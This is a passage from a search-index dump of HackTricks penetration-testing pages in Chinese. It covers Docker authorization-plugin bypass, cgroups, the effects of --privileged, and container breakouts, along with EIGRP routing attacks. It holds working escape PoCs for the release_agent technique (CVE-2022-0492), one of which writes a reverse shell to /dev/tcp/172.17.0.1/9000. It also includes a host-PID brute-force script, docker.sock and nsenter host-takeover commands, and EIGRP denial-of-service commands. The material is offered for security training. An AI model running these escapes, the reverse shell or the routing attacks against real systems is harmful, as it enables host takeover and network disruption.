也有效,并可能允许你绕过限制。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 未检查的 JSON 属性","id":"1605","title":"未检查的 JSON 属性"},"1606":{"body":"如果 sysadmin 忘记 禁止 禁用 插件 的能力,你可以利用这一点来完全禁用它! bash docker plugin list #Enumerate plugins # If you don’t have access to enumerate the plugins you can see the name of the plugin in the error output:\\ndocker: Error response from daemon: authorization denied by plugin authobot:latest: use of Privileged containers is not allowed.\\n# \\"authbolt\\" is the name of the previous plugin docker plugin disable authobot\\ndocker run --rm -it --privileged -v /:/host ubuntu bash\\ndocker plugin enable authobot 记得在提升权限后 重新启用插件 ,否则 重启docker服务将无效 !","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 禁用插件","id":"1606","title":"禁用插件"},"1607":{"body":"https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Auth Plugin Bypass 文章","id":"1607","title":"Auth Plugin Bypass 文章"},"1608":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » CGroups","id":"1608","title":"CGroups"},"1609":{"body":"Linux 控制组 ,或称 cgroups ,是 Linux 内核的一个特性,允许在进程组之间分配、限制和优先处理系统资源,如 CPU、内存和磁盘 I/O。它们提供了一种 管理和隔离资源使用 的机制,适用于资源限制、工作负载隔离和不同进程组之间的资源优先级等目的。 有 两个版本的 cgroups :版本 1 和版本 2。两者可以在系统上同时使用。主要区别在于 cgroups 版本 2 引入了 层次化的树状结构 ,使得在进程组之间进行更细致和详细的资源分配成为可能。此外,版本 2 还带来了各种增强功能,包括: 除了新的层次化组织,cgroups 版本 2 还引入了 其他几个变化和改进 ,例如对 新资源控制器 的支持、更好的遗留应用程序支持和性能提升。 总体而言,cgroups 版本 2 提供了更多功能和更好的性能 ,但在某些需要与旧系统兼容的场景中,仍然可以使用版本 1。 您可以通过查看 /proc/ 中的 cgroup 文件来列出任何进程的 v1 和 v2 cgroups。您可以通过以下命令开始查看您 shell 的 cgroups: shell-session $ cat /proc/self/cgroup\\n12:rdma:/\\n11:net_cls,net_prio:/\\n10:perf_event:/\\n9:cpuset:/\\n8:cpu,cpuacct:/user.slice\\n7:blkio:/user.slice\\n6:memory:/user.slice 5:pids:/user.slice/user-1000.slice/session-2.scope 4:devices:/user.slice\\n3:freezer:/\\n2:hugetlb:/testcgroup\\n1:name=systemd:/user.slice/user-1000.slice/session-2.scope\\n0::/user.slice/user-1000.slice/session-2.scope 输出结构如下: 数字 2–12 :cgroups v1,每行代表一个不同的 cgroup。控制器在数字旁边指定。 数字 1 :也是 cgroups v1,但仅用于管理目的(由例如 systemd 设置),并且没有控制器。 数字 0 :表示 cgroups v2。没有列出控制器,这一行仅在仅运行 cgroups v2 的系统上存在。 名称是层次结构的 ,类似于文件路径,指示不同 cgroups 之间的结构和关系。 像 /user.slice 或 /system.slice 的名称 指定了 cgroups 的分类,user.slice 通常用于由 systemd 管理的登录会话,而 system.slice 用于系统服务。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » 基本信息","id":"1609","title":"基本信息"},"161":{"body":"目标 :通过注入虚假路由来干扰网络流量,导致流量被引导到一个不存在的目的地。 工具 : routeinject.py 脚本。 执行 : %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%% 参数 : --interface:指定攻击者的系统接口。 --as:定义EIGRP AS编号。 --src:设置攻击者的IP地址。 --dst:设置目标子网IP。 --prefix:定义目标子网IP的掩码。","breadcrumbs":"Pentesting Network » EIGRP Attacks » EIGRP黑洞攻击","id":"161","title":"EIGRP黑洞攻击"},"1610":{"body":"文件系统通常用于访问 cgroups ,与传统用于内核交互的 Unix 系统调用接口不同。要调查 shell 的 cgroup 配置,应检查 /proc/self/cgroup 文件,该文件显示 
shell 的 cgroup。然后,通过导航到 /sys/fs/cgroup (或 /sys/fs/cgroup/unified )目录并找到一个与 cgroup 名称相同的目录,可以观察与 cgroup 相关的各种设置和资源使用信息。 Cgroup Filesystem cgroups 的关键接口文件以 cgroup 为前缀。 cgroup.procs 文件可以使用标准命令如 cat 查看,列出 cgroup 中的进程。另一个文件 cgroup.threads 包含线程信息。 Cgroup Procs 管理 shell 的 cgroups 通常包含两个控制器,用于调节内存使用和进程数量。要与控制器交互,应参考带有控制器前缀的文件。例如, pids.current 将被引用以确定 cgroup 中的线程数量。 Cgroup Memory 值中 max 的指示表明 cgroup 没有特定限制。然而,由于 cgroups 的层次结构,限制可能由目录层次结构中较低级别的 cgroup 强加。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » 查看 cgroups","id":"1610","title":"查看 cgroups"},"1611":{"body":"通过 将其进程 ID (PID) 写入 cgroup.procs 文件 将进程分配给 cgroups。这需要 root 权限。例如,要添加一个进程: bash echo [pid] > cgroup.procs 同样, 修改 cgroup 属性,例如设置 PID 限制 ,是通过将所需值写入相关文件来完成的。要为 cgroup 设置最多 3,000 个 PID: bash echo 3000 > pids.max 创建新的 cgroups 涉及在 cgroup 层次结构中创建一个新的子目录,这会提示内核自动生成必要的接口文件。尽管没有活动进程的 cgroups 可以使用 rmdir 删除,但要注意某些限制: 进程只能放置在叶子 cgroups 中 (即层次结构中最嵌套的那些)。 一个 cgroup 不能拥有其父级中缺失的控制器 。 子 cgroups 的控制器必须在 cgroup.subtree_control 文件中显式声明 。例如,要在子 cgroup 中启用 CPU 和 PID 控制器: bash echo \\"+cpu +pids\\" > cgroup.subtree_control root cgroup 是这些规则的一个例外,允许直接放置进程。这可以用来将进程从 systemd 管理中移除。 监控 cgroup 内的 CPU 使用情况 可以通过 cpu.stat 文件实现,该文件显示总的 CPU 时间消耗,有助于跟踪服务的子进程的使用情况: cpu.stat 文件中显示的 CPU 使用统计信息","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » 操作和创建 cgroups","id":"1611","title":"操作和创建 cgroups"},"1612":{"body":"书籍:Linux 工作原理,第 3 版:每个超级用户应该知道的内容,作者:Brian Ward tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » References","id":"1612","title":"References"},"1613":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » Docker --privileged","id":"1613","title":"Docker --privileged"},"1614":{"body":"当你以特权模式运行容器时,你正在禁用以下保护:","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 影响因素","id":"1614","title":"影响因素"},"1615":{"body":"在特权容器中,所有的 设备可以在 /dev/ 中访问 。因此,你可以通过 挂载 主机的磁盘来 逃逸 。 Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\nls /dev\\nconsole fd mqueue ptmx random stderr stdout urandom\\ncore full null pts shm stdin tty zero bash # docker run --rm --privileged -it alpine sh\\nls /dev\\ncachefiles mapper port shm tty24 tty44 tty7\\nconsole mem psaux stderr tty25 tty45 tty8\\ncore mqueue ptmx stdin tty26 tty46 tty9\\ncpu nbd0 pts stdout tty27 tty47 ttyS0\\n[...]","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 挂载 /dev","id":"1615","title":"挂载 /dev"},"1616":{"body":"内核文件系统为进程提供了一种修改内核行为的机制。然而,对于容器进程,我们希望防止它们对内核进行任何更改。因此,我们在容器内将内核文件系统挂载为 只读 ,确保容器进程无法修改内核。 Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\nmount | grep \'(ro\'\\nsysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)\\ncpuset on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)\\ncpu on /sys/fs/cgroup/cpu type cgroup (ro,nosuid,nodev,noexec,relatime,cpu)\\ncpuacct on /sys/fs/cgroup/cpuacct type cgroup 
(ro,nosuid,nodev,noexec,relatime,cpuacct) bash # docker run --rm --privileged -it alpine sh\\nmount | grep \'(ro\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 只读内核文件系统","id":"1616","title":"只读内核文件系统"},"1617":{"body":"/proc 文件系统是选择性可写的,但出于安全原因,某些部分通过用 tmpfs 进行覆盖而屏蔽了写入和读取访问,确保容器进程无法访问敏感区域。 [!NOTE] > tmpfs 是一个将所有文件存储在虚拟内存中的文件系统。tmpfs 不会在你的硬盘上创建任何文件。因此,如果你卸载一个 tmpfs 文件系统,里面的所有文件将永远丢失。 Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\nmount | grep /proc.*tmpfs\\ntmpfs on /proc/acpi type tmpfs (ro,relatime)\\ntmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)\\ntmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) bash # docker run --rm --privileged -it alpine sh\\nmount | grep /proc.*tmpfs","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 遮蔽内核文件系统","id":"1617","title":"遮蔽内核文件系统"},"1618":{"body":"容器引擎以 有限的能力 启动容器,以控制容器内部的操作。 特权 容器具有 所有 可用的 能力 。要了解能力,请阅读: Linux Capabilities Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\napk add -U libcap; capsh --print\\n[...]\\nCurrent: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=eip\\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\n[...] 
bash # docker run --rm --privileged -it alpine sh\\napk add -U libcap; capsh --print\\n[...]\\nCurrent: =eip cap_perfmon,cap_bpf,cap_checkpoint_restore-eip\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read\\n[...] 您可以通过使用 --cap-add 和 --cap-drop 标志来操控容器可用的能力,而无需以 --privileged 模式运行。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » Linux capabilities","id":"1618","title":"Linux capabilities"},"1619":{"body":"Seccomp 对于 限制 容器可以调用的 syscalls 非常有用。默认情况下,在运行 docker 容器时启用默认的 seccomp 配置文件,但在特权模式下它是禁用的。有关 Seccomp 的更多信息,请访问: Seccomp Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\ngrep Seccomp /proc/1/status\\nSeccomp:\\t2\\nSeccomp_filters:\\t1 bash # docker run --rm --privileged -it alpine sh\\ngrep Seccomp /proc/1/status\\nSeccomp:\\t0\\nSeccomp_filters:\\t0 bash # You can manually disable seccomp in docker with\\n--security-opt seccomp=unconfined 另外,请注意,当在 Kubernetes 集群中使用 Docker(或其他 CRI)时, seccomp 过滤器默认是禁用的 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » Seccomp","id":"1619","title":"Seccomp"},"162":{"body":"目标 :通过注入更改的K值在EIGRP域内创建持续的中断和重新连接,最终导致DoS攻击。 工具 : relationshipnightmare.py 脚本。 执行 : %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%% 参数 : --interface:指定网络接口。 --as:定义EIGRP AS编号。 --src:设置合法路由器的IP地址。","breadcrumbs":"Pentesting Network » EIGRP Attacks » 
滥用K值攻击","id":"162","title":"滥用K值攻击"},"1620":{"body":"AppArmor 是一种内核增强,用于将 容器 限制在 有限 的 资源 集合中,具有 每个程序的配置文件 。当您使用 --privileged 标志运行时,此保护将被禁用。 AppArmor bash # You can manually disable seccomp in docker with\\n--security-opt apparmor=unconfined","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » AppArmor","id":"1620","title":"AppArmor"},"1621":{"body":"运行带有 --privileged 标志的容器会禁用 SELinux 标签 ,使其继承容器引擎的标签,通常为 unconfined,从而授予与容器引擎相似的完全访问权限。在无根模式下,它使用 container_runtime_t,而在根模式下,应用 spc_t。 SELinux bash # You can manually disable selinux in docker with\\n--security-opt label:disable","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » SELinux","id":"1621","title":"SELinux"},"1622":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 什么不受影响","id":"1622","title":"什么不受影响"},"1623":{"body":"命名空间 不受 --privileged标志的影响。尽管它们没有启用安全约束,但它们 并不能看到系统或主机网络上的所有进程,例如 。用户可以通过使用**--pid=host、--net=host、--ipc=host、--uts=host**容器引擎标志来禁用单个命名空间。 Inside default privileged container\\nInside --pid=host Container bash # docker run --rm --privileged -it alpine sh\\nps -ef\\nPID USER TIME COMMAND\\n1 root 0:00 sh\\n18 root 0:00 ps -ef bash # docker run --rm --privileged --pid=host -it alpine sh\\nps -ef\\nPID USER TIME COMMAND\\n1 root 0:03 /sbin/init\\n2 root 0:00 [kthreadd]\\n3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs\\n[...]","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 命名空间","id":"1623","title":"命名空间"},"1624":{"body":"默认情况下,容器引擎不使用用户命名空间,除了无根容器 ,无根容器需要它们进行文件系统挂载和使用多个 UID。用户命名空间对于无根容器至关重要,无法禁用,并通过限制特权显著增强安全性。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 用户命名空间","id":"1624","title":"用户命名空间"},"1625":{"body":"https://www.redhat.com/sysadmin/privileged-flag-container-engines tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: 
HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 参考","id":"1625","title":"参考"},"1626":{"body":"Reading time: 25 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker Breakout / Privilege Escalation","id":"1626","title":"Docker Breakout / Privilege Escalation"},"1627":{"body":"linpeas : 它也可以 枚举容器 CDK : 这个工具对于枚举你所在的容器非常 有用,甚至可以尝试自动逃逸 amicontained : 有用的工具,用于获取容器的权限,以便找到逃逸的方法 deepce : 用于枚举和逃逸容器的工具 grype : 获取镜像中安装的软件所包含的 CVE","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 自动枚举与逃逸","id":"1627","title":"自动枚举与逃逸"},"1628":{"body":"如果你发现 docker 套接字被挂载 在 docker 容器内,你将能够从中逃逸。 这通常发生在某些需要连接到 docker 守护进程以执行操作的 docker 容器中。 bash #Search the socket\\nfind / -name docker.sock 2>/dev/null\\n#It\'s usually in /run/docker.sock 在这种情况下,您可以使用常规的 docker 命令与 docker 守护进程进行通信: bash #List images to use one\\ndocker images\\n#Run the image mounting the host disk and chroot on it\\ndocker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash # Get full access to the host via ns pid and nsenter cli\\ndocker run -it --rm --pid=host --privileged ubuntu bash\\nnsenter --target 1 --mount --uts --ipc --net --pid -- bash # Get full privs in container without --privileged\\ndocker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable 
--pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash tip 如果 docker socket在意外的位置 ,您仍然可以使用带有参数**-H unix:///path/to/docker.sock 的 docker**命令与其通信。 Docker守护进程也可能在一个端口上 监听(默认2375, 2376) ,或者在基于Systemd的系统上,可以通过Systemd socket fd://与Docker守护进程进行通信。 tip 此外,请注意其他高级运行时的运行时socket: dockershim: unix:///var/run/dockershim.sock containerd: unix:///run/containerd/containerd.sock cri-o: unix:///var/run/crio/crio.sock frakti: unix:///var/run/frakti.sock rktlet: unix:///var/run/rktlet.sock ...","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 挂载的 Docker 套接字逃逸","id":"1628","title":"挂载的 Docker 套接字逃逸"},"1629":{"body":"您应该检查容器的能力,如果它具有以下任何一种,您可能能够逃离它: CAP_SYS_ADMIN 、 CAP_SYS_PTRACE 、 CAP_SYS_MODULE 、 DAC_READ_SEARCH 、 DAC_OVERRIDE、CAP_SYS_RAWIO、CAP_SYSLOG、CAP_NET_RAW、CAP_NET_ADMIN 您可以使用 之前提到的自动工具 或: bash capsh --print 在以下页面中,您可以 了解更多关于 Linux 能力 的信息,以及如何滥用它们以逃逸/提升权限: Linux Capabilities","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 能力滥用逃逸","id":"1629","title":"能力滥用逃逸"},"163":{"body":"目标 :通过向路由表中填充大量虚假路由来加重路由器的CPU和RAM负担。 工具 : routingtableoverflow.py 脚本。 执行 : %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%% 参数 : --interface:指定网络接口。 --as:定义EIGRP AS编号。 --src:设置攻击者的IP地址。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » EIGRP Attacks » 路由表溢出攻击","id":"163","title":"路由表溢出攻击"},"1630":{"body":"可以使用 --privileged 标志或禁用特定防御来创建特权容器: --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host Mount /dev --privileged 标志显著降低了容器安全性,提供 无限制的设备访问 并绕过 多个保护措施 。有关详细信息,请参阅 --privileged 的完整影响文档。 Docker --privileged","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 从特权容器逃逸","id":"1630","title":"从特权容器逃逸"},"1631":{"body":"拥有这些权限后,您可以 像 init(pid:1)一样,直接移动到主机上以 root 身份运行的进程的命名空间 ,只需运行:nsenter --target 1 --mount --uts --ipc --net --pid -- bash 在容器中执行测试: bash docker run --rm -it --pid=host --privileged ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 特权 + hostPID","id":"1631","title":"特权 + hostPID"},"1632":{"body":"仅凭特权标志,您可以尝试 访问主机的磁盘 或尝试 通过滥用 release_agent 或其他逃逸进行逃逸 。 在容器中执行以下绕过测试: bash docker run --rm -it --privileged ubuntu bash 挂载磁盘 - Poc1 配置良好的 docker 容器不会允许像 fdisk -l 这样的命令。然而,在错误配置的 docker 命令中,如果指定了标志 --privileged 或 --device=/dev/sda1(带大写),则可以获得查看主机驱动器的权限。 因此,要接管主机机器,这很简单: bash mkdir -p /mnt/hola\\nmount /dev/sda1 /mnt/hola 而且,瞧!您现在可以访问主机的文件系统,因为它已挂载在 /mnt/hola 文件夹中。 挂载磁盘 - Poc2 在容器内,攻击者可能会尝试通过集群创建的可写 hostPath 卷进一步访问底层主机操作系统。以下是您可以在容器内检查的一些常见事项,以查看您是否可以利用此攻击者向量: bash ### Check if You Can Write to a File-system\\necho 1 > /proc/sysrq-trigger ### Check root UUID\\ncat /proc/cmdline\\nBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300 # Check Underlying Host Filesystem\\nfindfs UUID=\\n/dev/sda1 # Attempt to Mount the Host\'s Filesystem\\nmkdir /mnt-test\\nmount /dev/sda1 /mnt-test\\nmount: /mnt: permission denied. ---> Failed! 
but if not, you may have access to the underlying host OS file-system now. ### debugfs (Interactive File System Debugger)\\ndebugfs /dev/sda1 特权逃逸 利用现有的 release_agent ( cve-2022-0492 ) - PoC1 Initial PoC # spawn a new container to exploit via:\\n# docker run --rm -it --privileged ubuntu bash # Finds + enables a cgroup release_agent\\n# Looks for something like: /sys/fs/cgroup/*/release_agent\\nd=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`\\n# If \\"d\\" is empty, this won\'t work, you need to use the next PoC # Enables notify_on_release in the cgroup\\nmkdir -p $d/w;\\necho 1 >$d/w/notify_on_release\\n# If you have a \\"Read-only file system\\" error, you need to use the next PoC # Finds path of OverlayFS mount for container\\n# Unless the configuration explicitly exposes the mount point of the host filesystem\\n# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html\\nt=`sed -n \'s/overlay \\\\/ .*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab` # Sets release_agent to /path/payload\\ntouch /o; echo $t/c > $d/release_agent # Creates a payload\\necho \\"#!/bin/sh\\" > /c\\necho \\"ps > $t/o\\" >> /c\\nchmod +x /c # Triggers the cgroup via empty cgroup.procs\\nsh -c \\"echo 0 > $d/w/cgroup.procs\\"; sleep 1 # Reads the output\\ncat /o 特权逃逸 利用创建的 release_agent ( cve-2022-0492 ) - PoC2 Second PoC # On the host\\ndocker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash # Mounts the RDMA cgroup controller and create a child cgroup\\n# This technique should work with the majority of cgroup controllers\\n# If you\'re following along and get \\"mount: /tmp/cgrp: special device cgroup does not exist\\"\\n# It\'s because your setup doesn\'t have the RDMA cgroup controller, try change rdma to memory to fix it\\nmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x\\n# If mount gives an error, this won\'t work, you need to use the first PoC # Enables cgroup notifications on release of 
the \\"x\\" cgroup\\necho 1 > /tmp/cgrp/x/notify_on_release # Finds path of OverlayFS mount for container\\n# Unless the configuration explicitly exposes the mount point of the host filesystem\\n# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html\\nhost_path=`sed -n \'s/.*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab` # Sets release_agent to /path/payload\\necho \\"$host_path/cmd\\" > /tmp/cgrp/release_agent #For a normal PoC =================\\necho \'#!/bin/sh\' > /cmd\\necho \\"ps aux > $host_path/output\\" >> /cmd\\nchmod a+x /cmd\\n#===================================\\n#Reverse shell\\necho \'#!/bin/bash\' > /cmd\\necho \\"bash -i >& /dev/tcp/172.17.0.1/9000 0>&1\\" >> /cmd\\nchmod a+x /cmd\\n#=================================== # Executes the attack by spawning a process that immediately ends inside the \\"x\\" child cgroup\\n# By creating a /bin/sh process and writing its PID to the cgroup.procs file in \\"x\\" child cgroup directory\\n# The script on the host will execute after /bin/sh exits\\nsh -c \\"echo \\\\$\\\\$ > /tmp/cgrp/x/cgroup.procs\\" # Reads the output\\ncat /output 找到 技术的解释 在: Docker release_agent cgroups escape 特权逃逸 利用 release_agent 而不知道相对路径 - PoC3 在之前的漏洞中, 容器在主机文件系统中的绝对路径被泄露 。然而,这并不总是如此。在你 不知道容器在主机中的绝对路径 的情况下,你可以使用这个技术: release_agent exploit - Relative Paths to PIDs bash #!/bin/sh OUTPUT_DIR=\\"/\\"\\nMAX_PID=65535\\nCGROUP_NAME=\\"xyx\\"\\nCGROUP_MOUNT=\\"/tmp/cgrp\\"\\nPAYLOAD_NAME=\\"${CGROUP_NAME}_payload.sh\\"\\nPAYLOAD_PATH=\\"${OUTPUT_DIR}/${PAYLOAD_NAME}\\"\\nOUTPUT_NAME=\\"${CGROUP_NAME}_payload.out\\"\\nOUTPUT_PATH=\\"${OUTPUT_DIR}/${OUTPUT_NAME}\\" # Run a process for which we can search for (not needed in reality, but nice to have)\\nsleep 10000 & # Prepare the payload script to execute on the host\\ncat > ${PAYLOAD_PATH} << __EOF__\\n#!/bin/sh OUTPATH=\\\\$(dirname \\\\$0)/${OUTPUT_NAME} # Commands to run on the host<\\nps -eaf > \\\\${OUTPATH} 2>&1\\n__EOF__ # Make the payload script 
executable\\nchmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller\\nmkdir ${CGROUP_MOUNT}\\nmount -t cgroup -o memory cgroup ${CGROUP_MOUNT}\\nmkdir ${CGROUP_MOUNT}/${CGROUP_NAME}\\necho 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses\\nTPID=1\\nwhile [ ! -f ${OUTPUT_PATH} ]\\ndo\\nif [ $((${TPID} % 100)) -eq 0 ]\\nthen\\necho \\"Checking pid ${TPID}\\"\\nif [ ${TPID} -gt ${MAX_PID} ]\\nthen\\necho \\"Exiting at ${MAX_PID} :-(\\"\\nexit 1\\nfi\\nfi\\n# Set the release_agent path to the guessed pid\\necho \\"/proc/${TPID}/root${PAYLOAD_PATH}\\" > ${CGROUP_MOUNT}/release_agent\\n# Trigger execution of the release_agent\\nsh -c \\"echo \\\\$\\\\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs\\"\\nTPID=$((${TPID} + 1))\\ndone # Wait for and cat the output\\nsleep 1\\necho \\"Done! Output:\\"\\ncat ${OUTPUT_PATH} 在特权容器中执行 PoC 应该会提供类似于以下的输出: bash root@container:~$ ./release_agent_pid_brute.sh\\nChecking pid 100\\nChecking pid 200\\nChecking pid 300\\nChecking pid 400\\nChecking pid 500\\nChecking pid 600\\nChecking pid 700\\nChecking pid 800\\nChecking pid 900\\nChecking pid 1000\\nChecking pid 1100\\nChecking pid 1200 Done! Output:\\nUID PID PPID C STIME TTY TIME CMD\\nroot 1 0 0 11:25 ? 00:00:01 /sbin/init\\nroot 2 0 0 11:25 ? 00:00:00 [kthreadd]\\nroot 3 2 0 11:25 ? 00:00:00 [rcu_gp]\\nroot 4 2 0 11:25 ? 00:00:00 [rcu_par_gp]\\nroot 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events]\\nroot 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd]\\nroot 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq]\\nroot 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]\\n... 
